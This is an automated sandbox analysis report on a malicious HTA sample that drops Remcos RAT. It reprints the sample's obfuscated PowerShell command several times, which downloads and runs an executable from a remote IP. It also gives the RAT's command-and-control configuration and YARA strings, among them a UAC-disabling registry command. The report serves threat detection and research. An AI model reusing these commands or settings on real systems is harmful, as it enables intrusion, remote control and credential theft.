Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
newthingswithgreatupdateiongivenbestthingswithme.hta

Overview

General Information

Sample name:newthingswithgreatupdateiongivenbestthingswithme.hta
Analysis ID:1576256
MD5:fd6fc3abb81de5133fb2de54b937ca20
SHA1:241f7fa153504078a9a9b07f966f3c4e862a9545
SHA256:73d0a015a1d5a1a846d3451a8ba70964c56581b06279208cb87c6c2eea1a6644
Tags:htauser-abuse_ch
Infos:

Detection

Cobalt Strike, Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Detected Cobalt Strike Beacon
Detected Remcos RAT
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Yara detected obfuscated html page
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Loading BitLocker PowerShell Module
PowerShell case anomaly found
Powershell drops PE file
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Suspicious MSHTA Child Process
Suspicious command line found
Suspicious powershell command line found
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • mshta.exe (PID: 2504 cmdline: mshta.exe "C:\Users\user\Desktop\newthingswithgreatupdateiongivenbestthingswithme.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • cmd.exe (PID: 4484 cmdline: "C:\Windows\system32\cmd.exe" "/C PoWeRsHelL -EX BYPass -nop -W 1 -C deVicecREDeNtIaLDEPLOYmEnt.ExE ; INVOkE-ExPRESsIon($(iNVOKe-eXprEsSIoN('[SYsTem.tEXT.eNCODing]'+[cHAr]58+[chAR]58+'UTF8.GeTSTrInG([sySTEm.coNVErt]'+[cHAR]0X3A+[CHar]58+'fRomBasE64StriNG('+[cHAr]0X22+'JHJIQVp5bkw1UG1uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRFZkluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTi5kbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtidUtvVmpvYUxlLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwWWZJLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMa0ZHT09RclBIUix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdzeE9URlFFZXAsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFoWFEpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImlSRFN1IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZXNQYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5sT0NzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHJIQVp5bkw1UG1uOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc5LjE2Ni83NS9lY29tZS5leGUiLCIkRW52OkFQUERBVEFcbmljZXRvbWVldHlvdXN3ZWVldC5leGUiLDAsMCk7U1RBUlQtU2xFRXAoMyk7aU52b0tFLWVYUFJlU1NJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxuaWNldG9tZWV0eW91c3dlZWV0LmV4ZSI='+[cHAR]0x22+'))')))" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2568 cmdline: PoWeRsHelL -EX BYPass -nop -W 1 -C deVicecREDeNtIaLDEPLOYmEnt.ExE ; INVOkE-ExPRESsIon($(iNVOKe-eXprEsSIoN('[SYsTem.tEXT.eNCODing]'+[cHAr]58+[chAR]58+'UTF8.GeTSTrInG([sySTEm.coNVErt]'+[cHAR]0X3A+[CHar]58+'fRomBasE64StriNG('+[cHAr]0X22+'JHJIQVp5bkw1UG1uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRFZkluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTi5kbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtidUtvVmpvYUxlLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwWWZJLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMa0ZHT09RclBIUix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdzeE9URlFFZXAsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFoWFEpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImlSRFN1IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZXNQYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5sT0NzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHJIQVp5bkw1UG1uOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc5LjE2Ni83NS9lY29tZS5leGUiLCIkRW52OkFQUERBVEFcbmljZXRvbWVldHlvdXN3ZWVldC5leGUiLDAsMCk7U1RBUlQtU2xFRXAoMyk7aU52b0tFLWVYUFJlU1NJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxuaWNldG9tZWV0eW91c3dlZWV0LmV4ZSI='+[cHAR]0x22+'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • csc.exe (PID: 4820 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jxpeahvf\jxpeahvf.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
          • cvtres.exe (PID: 4228 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC255.tmp" "c:\Users\user\AppData\Local\Temp\jxpeahvf\CSC89F653F7BE434269AEE32879D026A860.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
        • nicetomeetyousweeet.exe (PID: 7088 cmdline: "C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe" MD5: A2D03C5333BFECCA62720CD6EE3A4DC4)
          • WerFault.exe (PID: 1188 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 636 MD5: C31336C1EFC2CCB44B4326EA793040F2)
          • WerFault.exe (PID: 2060 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 656 MD5: C31336C1EFC2CCB44B4326EA793040F2)
          • WerFault.exe (PID: 2032 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 664 MD5: C31336C1EFC2CCB44B4326EA793040F2)
          • WerFault.exe (PID: 6044 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 712 MD5: C31336C1EFC2CCB44B4326EA793040F2)
          • WerFault.exe (PID: 3664 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 640 MD5: C31336C1EFC2CCB44B4326EA793040F2)
          • WerFault.exe (PID: 2936 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 636 MD5: C31336C1EFC2CCB44B4326EA793040F2)
          • WerFault.exe (PID: 2416 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 664 MD5: C31336C1EFC2CCB44B4326EA793040F2)
          • WerFault.exe (PID: 7068 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 736 MD5: C31336C1EFC2CCB44B4326EA793040F2)
          • WerFault.exe (PID: 5288 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 756 MD5: C31336C1EFC2CCB44B4326EA793040F2)
          • WerFault.exe (PID: 6044 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 772 MD5: C31336C1EFC2CCB44B4326EA793040F2)
          • WerFault.exe (PID: 5548 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 776 MD5: C31336C1EFC2CCB44B4326EA793040F2)
          • WerFault.exe (PID: 3152 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 636 MD5: C31336C1EFC2CCB44B4326EA793040F2)
          • WerFault.exe (PID: 4136 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 784 MD5: C31336C1EFC2CCB44B4326EA793040F2)
          • WerFault.exe (PID: 5172 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 792 MD5: C31336C1EFC2CCB44B4326EA793040F2)
          • WerFault.exe (PID: 5676 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 708 MD5: C31336C1EFC2CCB44B4326EA793040F2)
          • WerFault.exe (PID: 3796 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 720 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": ["107.173.4.16:2560:1"], "Assigned name": "elvis", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-GJDISH", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
newthingswithgreatupdateiongivenbestthingswithme.htaJoeSecurity_ObshtmlYara detected obfuscated html pageJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000006.00000002.4146258809.00000000005B0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
    • 0x778:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
    00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
      00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
          00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
          • 0x6b6f8:$a1: Remcos restarted by watchdog!
          • 0x6bc70:$a3: %02i:%02i:%02i:%03i
          Click to see the 18 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          6.2.nicetomeetyousweeet.exe.400000.0.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
            6.2.nicetomeetyousweeet.exe.400000.0.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
              6.2.nicetomeetyousweeet.exe.400000.0.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                6.2.nicetomeetyousweeet.exe.400000.0.raw.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                • 0x6b6f8:$a1: Remcos restarted by watchdog!
                • 0x6bc70:$a3: %02i:%02i:%02i:%03i
                6.2.nicetomeetyousweeet.exe.400000.0.raw.unpackREMCOS_RAT_variantsunknownunknown
                • 0x65994:$str_a1: C:\Windows\System32\cmd.exe
                • 0x65910:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                • 0x65910:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                • 0x65e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                • 0x66410:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                • 0x65a04:$str_b2: Executing file:
                • 0x6683c:$str_b3: GetDirectListeningPort
                • 0x66200:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                • 0x66380:$str_b7: \update.vbs
                • 0x65a2c:$str_b9: Downloaded file:
                • 0x65a18:$str_b10: Downloading file:
                • 0x65abc:$str_b12: Failed to upload file:
                • 0x66804:$str_b13: StartForward
                • 0x66824:$str_b14: StopForward
                • 0x662d8:$str_b15: fso.DeleteFile "
                • 0x6626c:$str_b16: On Error Resume Next
                • 0x66308:$str_b17: fso.DeleteFolder "
                • 0x65aac:$str_b18: Uploaded file:
                • 0x65a6c:$str_b19: Unable to delete:
                • 0x662a0:$str_b20: while fso.FileExists("
                • 0x65f49:$str_c0: [Firefox StoredLogins not found]
                Click to see the 31 entries

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Suspicious MSHTA Child Process
                Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\system32\cmd.exe" "/C PoWeRsHelL -EX BYPass -nop -W 1 -C deVicecREDeNtIaLDEPLOYmEnt.ExE ; INVOkE-ExPRESsIon($(iNVOKe-eXprEsSIoN('[SYsTem.tEXT.eNCODing]'+[cHAr]58+[chAR]58+'UTF8.GeTSTrInG([sySTEm.coNVErt]'+[cHAR]0X3A+[CHar]58+'fRomBasE64StriNG('+[cHAr]0X22+'JHJIQVp5bkw1UG1uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRFZkluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTi5kbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtidUtvVmpvYUxlLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwWWZJLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMa0ZHT09RclBIUix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdzeE9URlFFZXAsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFoWFEpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImlSRFN1IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZXNQYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5sT0NzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHJIQVp5bkw1UG1uOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc5LjE2Ni83NS9lY29tZS5leGUiLCIkRW52OkFQUERBVEFcbmljZXRvbWVldHlvdXN3ZWVldC5leGUiLDAsMCk7U1RBUlQtU2xFRXAoMyk7aU52b0tFLWVYUFJlU1NJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxuaWNldG9tZWV0eW91c3dlZWV0LmV4ZSI='+[cHAR]0x22+'))')))", CommandLine: "C:\Windows\system32\cmd.exe" "/C PoWeRsHelL -EX BYPass -nop -W 1 -C deVicecREDeNtIaLDEPLOYmEnt.ExE ; INVOkE-ExPRESsIon($(iNVOKe-eXprEsSIoN('[SYsTem.tEXT.eNCODing]'+[cHAr]58+[chAR]58+'UTF8.GeTSTrInG([sySTEm.coNVErt]'+[cHAR]0X3A+[CHar]58+'fRomBasE64StriNG('+[cHAr]0X22+'JHJIQVp5bkw1UG1uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRFZkluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTi5kbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtidUtvVmpvYUxlLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwWWZJLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMa0ZHT09RclBIUix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdzeE9URlFFZXAsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFoWFEpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA
                Sigma detected: Dynamic .NET Compilation Via Csc.EXE
                Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jxpeahvf\jxpeahvf.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jxpeahvf\jxpeahvf.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: PoWeRsHelL -EX BYPass -nop -W 1 -C deVicecREDeNtIaLDEPLOYmEnt.ExE ; INVOkE-ExPRESsIon($(iNVOKe-eXprEsSIoN('[SYsTem.tEXT.eNCODing]'+[cHAr]58+[chAR]58+'UTF8.GeTSTrInG([sySTEm.coNVErt]'+[cHAR]0X3A+[CHar]58+'fRomBasE64StriNG('+[cHAr]0X22+'JHJIQVp5bkw1UG1uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRFZkluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTi5kbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtidUtvVmpvYUxlLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwWWZJLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMa0ZHT09RclBIUix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdzeE9URlFFZXAsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFoWFEpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImlSRFN1IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZXNQYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5sT0NzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHJIQVp5bkw1UG1uOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc5LjE2Ni83NS9lY29tZS5leGUiLCIkRW52OkFQUERBVEFcbmljZXRvbWVldHlvdXN3ZWVldC5leGUiLDAsMCk7U1RBUlQtU2xFRXAoMyk7aU52b0tFLWVYUFJlU1NJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxuaWNldG9tZWV0eW91c3dlZWV0LmV4ZSI='+[cHAR]0x22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2568, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jxpeahvf\jxpeahvf.cmdline", ProcessId: 4820, ProcessName: csc.exe
                Sigma detected: Potential Binary Or Script Dropper Via PowerShell
                Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2568, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ecome[1].exe
                Sigma detected: Dynamic CSharp Compile Artefact
                Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2568, TargetFilename: C:\Users\user\AppData\Local\Temp\jxpeahvf\jxpeahvf.cmdline
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: PoWeRsHelL -EX BYPass -nop -W 1 -C deVicecREDeNtIaLDEPLOYmEnt.ExE ; INVOkE-ExPRESsIon($(iNVOKe-eXprEsSIoN('[SYsTem.tEXT.eNCODing]'+[cHAr]58+[chAR]58+'UTF8.GeTSTrInG([sySTEm.coNVErt]'+[cHAR]0X3A+[CHar]58+'fRomBasE64StriNG('+[cHAr]0X22+'JHJIQVp5bkw1UG1uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRFZkluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTi5kbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtidUtvVmpvYUxlLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwWWZJLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMa0ZHT09RclBIUix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdzeE9URlFFZXAsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFoWFEpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImlSRFN1IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZXNQYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5sT0NzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHJIQVp5bkw1UG1uOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc5LjE2Ni83NS9lY29tZS5leGUiLCIkRW52OkFQUERBVEFcbmljZXRvbWVldHlvdXN3ZWVldC5leGUiLDAsMCk7U1RBUlQtU2xFRXAoMyk7aU52b0tFLWVYUFJlU1NJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxuaWNldG9tZWV0eW91c3dlZWV0LmV4ZSI='+[cHAR]0x22+'))')))", CommandLine: PoWeRsHelL -EX BYPass -nop -W 1 -C deVicecREDeNtIaLDEPLOYmEnt.ExE ; 